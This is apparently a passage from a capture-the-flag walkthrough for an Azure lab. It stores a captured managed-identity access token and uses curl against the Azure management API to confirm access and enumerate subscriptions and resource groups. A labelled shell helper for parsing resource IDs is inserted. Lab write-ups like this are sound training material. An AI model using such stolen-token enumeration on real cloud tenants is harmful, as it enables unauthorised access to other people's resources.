Recap

Let’s recap what we did for flag 4:

Next steps

We can cURL all the things and check out the access token. But before that, let’s set some context. Remember which Subscription and Resource Group the Supply Chain Management WebApp was in?

managedIdentityResourceId:"/subscriptions/41b63b94-5bb3-41b2-a2ad-2b411979dc26/resourcegroups/MP-PROD-2/providers/Microsoft.Web/sites/supplychain-mgmt"

The Subscription ID was 41b63b94-5bb3-41b2-a2ad-2b411979dc26 and the Resource Group was MP-PROD-2.
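
The split above can be done mechanically. This is an added example, not part of the original walkthrough: a POSIX shell function that breaks an ARM resource ID into its parts and rejects malformed input. The function name parse_arm_id and its field names are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: split an ARM resource ID into its components.
# parse_arm_id is a hypothetical helper name, not an Azure tool.
# Usage: parse_arm_id <resource-id> <subscription|resourcegroup|provider|type|name>
# Prints the requested component; returns 1 if the ID is malformed.
# The body runs in a subshell so IFS and positional changes stay local.
parse_arm_id() (
    id=${1#/}          # drop the leading slash
    field=$2
    IFS=/
    set -f             # no globbing while splitting on "/"
    set -- $id
    set +f
    # Layout: subscriptions/<sub>/resourceGroups/<rg>/providers/<ns>/<type>/<name>
    [ "$#" -ge 8 ] || return 1
    # The page's ID spells it "resourcegroups", so compare keywords in lower case.
    kw=$(printf '%s/%s/%s' "$1" "$3" "$5" | tr '[:upper:]' '[:lower:]')
    [ "$kw" = "subscriptions/resourcegroups/providers" ] || return 1
    # A subscription ID must be a GUID; check it before it goes into any URL.
    printf '%s' "$2" |
        grep -Eq '^[0-9a-fA-F]{8}-([0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}$' || return 1
    [ -n "$4" ] || return 1
    case $field in
        subscription)  printf '%s\n' "$2" ;;
        resourcegroup) printf '%s\n' "$4" ;;
        provider)      printf '%s\n' "$6" ;;
        type)          printf '%s\n' "$7" ;;
        name)          printf '%s\n' "$8" ;;
        *)             return 1 ;;
    esac
)

# The managedIdentityResourceId value quoted on this page.
ARM_ID='/subscriptions/41b63b94-5bb3-41b2-a2ad-2b411979dc26/resourcegroups/MP-PROD-2/providers/Microsoft.Web/sites/supplychain-mgmt'

SUB=$(parse_arm_id "$ARM_ID" subscription)
RG=$(parse_arm_id "$ARM_ID" resourcegroup)
printf 'subscription=%s\nresource group=%s\n' "$SUB" "$RG"
```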

Using this information let’s see what else is in that Resource Group. Save the access token in an environment variable for easier reference. Run:

export TOK="<access token goes here>"

Let’s ensure the access token is valid and at least has Reader access to Subscription ID 41b63b94-5bb3-41b2-a2ad-2b411979dc26:

curl -s -H "Authorization: Bearer $TOK" "https://management.azure.com/subscriptions?api-version=2020-01-01" | jq

We can see Subscription ID 41b63b94-5bb3-41b2-a2ad-2b411979dc26. Now we want to list the Resource Groups in that subscription:

curl -s -H "Authorization: Bearer $TOK" "https://management.azure.com/subscriptions/41b63b94-5bb3-41b2-a2ad-2b411979dc26/resourcegroups?api-version=2021-04-01" | jq